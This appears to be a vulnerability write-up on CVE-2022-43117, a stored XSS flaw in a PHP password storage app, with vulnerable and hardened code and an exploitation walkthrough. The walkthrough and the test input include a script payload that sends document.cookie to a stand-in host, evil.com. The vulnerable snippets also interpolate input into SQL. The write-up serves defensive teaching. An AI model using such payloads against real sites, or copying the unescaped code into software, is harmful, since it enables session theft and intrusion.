In late 2022, a set of cross-site scripting (XSS) vulnerabilities tracked as CVE-2022-43117 was disclosed in the popular open source Sourcecodester Password Storage Application (PHP/OOP and MySQL, version 1.). The flaws let an attacker run arbitrary JavaScript in the browser of any user who views an entry whose Name, Username, Description or Site Feature parameter carries a script payload. Below, we explain how these bugs work, what risk they carry, walk through exploitation step by step, and list references for those who want to dig deeper.

Overview

Application: Sourcecodester Password Storage Application  
Version: 1.  
Vulnerability Type: Multiple Reflected and Stored XSS  
CVE: CVE-2022-43117  
Original Report: Github Issue  

What Are XSS Vulnerabilities?

Cross-site scripting (XSS) lets an attacker inject client-side script into a page served by a site the victim trusts. When it succeeds, the script runs in the victim's browser with that site's origin, so the attacker can read any cookie that is not marked HttpOnly, perform actions as the logged-in user, or redirect the user to a malicious site.

Affected Fields

The Name, Username, Description and Site Feature parameters are all stored and later displayed without any sanitization, both on the dashboard and in the detailed view. That means if you create an entry whose Name is <script>alert(1)</script>, every browser that views that entry will pop up a JavaScript alert, or run whatever harmful script the attacker chose. Because the payload lives in the database, this is stored XSS: the attacker submits it once and every subsequent viewer is affected.

Consider a simplified version of the storage logic (from save.php or the equivalent CRUD file):

// This is the vulnerable snippet: the value comes straight from the request
// and is written to the database with no validation or encoding
$name = $_POST['name'];
// ...
$query = "INSERT INTO password_storage (name, ...) VALUES ('$name', ...)";
mysqli_query($conn, $query);

Later, in index.php, the stored value is echoed straight into the HTML table:

// Rendering stored password list: $row['name'] is emitted as raw HTML,
// so a stored <script> tag becomes a live script element
echo "<td>{$row['name']}</td>";

Nothing is escaped or sanitized at either point, so whatever was typed into the form is emitted as raw HTML and interpreted by the browser. Storing the raw value is fine; the missing step is encoding it when it is rendered (htmlspecialchars() with ENT_QUOTES in PHP) so that the text is displayed literally instead of being parsed as markup.
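Below is an added example, not code from the Sourcecodester application, showing the hardened form of both snippets: the insert done through a prepared statement and the render with every value HTML-encoded before it reaches the page. It assumes a mysqli connection in $conn and a password_storage table with columns name, username, description and site; only the name column appears in the original, so the other columns, the function names and safeUrl() are assumptions for illustration. It also goes slightly beyond the page by handling the attribute context (a Site value placed inside href), where HTML encoding alone is not enough.

```php
<?php
// Added example (not code from the Sourcecodester application): the two
// snippets above rewritten so that user input is neither interpolated into
// SQL nor echoed as raw HTML. Assumes a mysqli connection in $conn and a
// table password_storage(name, username, description, site); every column
// name except "name" is an assumption for illustration.
declare(strict_types=1);

/** HTML-encode a value for use in a text node or a double-quoted attribute.
 *  ENT_QUOTES also encodes single quotes; ENT_SUBSTITUTE replaces invalid
 *  UTF-8 instead of returning an empty string (which would silently hide data). */
function h(?string $value): string
{
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Only http(s) links may go into an href; anything else (javascript:, data:)
 *  is replaced, because HTML encoding does not make a URL scheme safe. */
function safeUrl(?string $url): string
{
    $url = trim((string) $url);
    return preg_match('~^https?://~i', $url) === 1 ? $url : '#';
}

/** save.php: store the raw value through a prepared statement. Encoding is
 *  done at output time, so the database keeps exactly what the user typed. */
function saveEntry(mysqli $conn, array $post): bool
{
    $name        = (string) ($post['name'] ?? '');
    $username    = (string) ($post['username'] ?? '');
    $description = (string) ($post['description'] ?? '');
    $site        = (string) ($post['site'] ?? '');

    $stmt = $conn->prepare(
        'INSERT INTO password_storage (name, username, description, site) VALUES (?, ?, ?, ?)'
    );
    $stmt->bind_param('ssss', $name, $username, $description, $site);
    return $stmt->execute();
}

/** index.php: render one table row. Every dynamic value passes through h(),
 *  and the link target additionally through safeUrl(), before it is output. */
function renderRow(array $row): string
{
    $site = safeUrl($row['site'] ?? '');
    return '<tr>'
        . '<td>' . h($row['name'] ?? '') . '</td>'
        . '<td>' . h($row['username'] ?? '') . '</td>'
        . '<td>' . h($row['description'] ?? '') . '</td>'
        . '<td><a href="' . h($site) . '">' . h($row['site'] ?? '') . '</a></td>'
        . '</tr>';
}

// Constructed input using the payloads from this write-up; run from the CLI
// to see that the script tags come out as inert text and the javascript: URL
// is neutralised.
if (PHP_SAPI === 'cli') {
    $row = [
        'name'        => "<script>alert('XSS')</script>",
        'username'    => 'attacker',
        'description' => "<script>fetch('https://evil.com?c='+document.cookie)</script>",
        'site'        => 'javascript:alert(document.cookie)',
    ];
    echo renderRow($row), PHP_EOL;
}
```

Run it with php on the command line and the constructed row prints with every angle bracket and quote encoded, so the browser would show the payload as text. The rule to take away is to encode at the point of output, for the context you are writing into; filtering on input (stripping <script>) is easy to bypass and corrupts legitimate data such as a description that happens to contain a less-than sign.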

Step-by-Step Exploitation

1. Create a Malicious Entry

Create an entry with form input like

Name: <script>alert('XSS')</script>
Username: attacker
...

2. View the Dashboard/List

When anyone loads the page, the stored value is written into the table unchanged and the script runs in their browser:

<td><script>alert('XSS')</script></td>

3. Steal Session Cookies

A pop-up only proves the bug is there. A real attacker enters this in Name (any of the affected fields works the same way):

<script>fetch('https://evil.com?c='+document.cookie)</script>

Every time a user views this entry, the script sends that user's cookies to evil.com. One caveat: document.cookie only exposes cookies set without the HttpOnly flag. If PHPSESSID is HttpOnly the attacker cannot read the session ID this way, but the script still runs as the victim and can read anything the dashboard displays or submit requests on the victim's behalf, so the flag reduces the damage without removing it.

References and Further Reading

- CVE-2022-43117 entry at NVD
- Original Vulnerability Disclosure on Github
- OWASP XSS

Final Words

CVE-2022-43117 shows how easy it is to overlook output encoding in PHP apps. If your code echoes user data without escaping, it is already exploitable. If you run Sourcecodester's Password Storage Application, update it and audit your own code now, even if the app is only reachable internally: a password manager is exactly where an attacker most wants to run script, and an XSS payload is always just a copy-paste away.

Timeline

Published on: 11/21/2022 18:15:00 UTC
Last modified on: 11/23/2022 15:54:00 UTC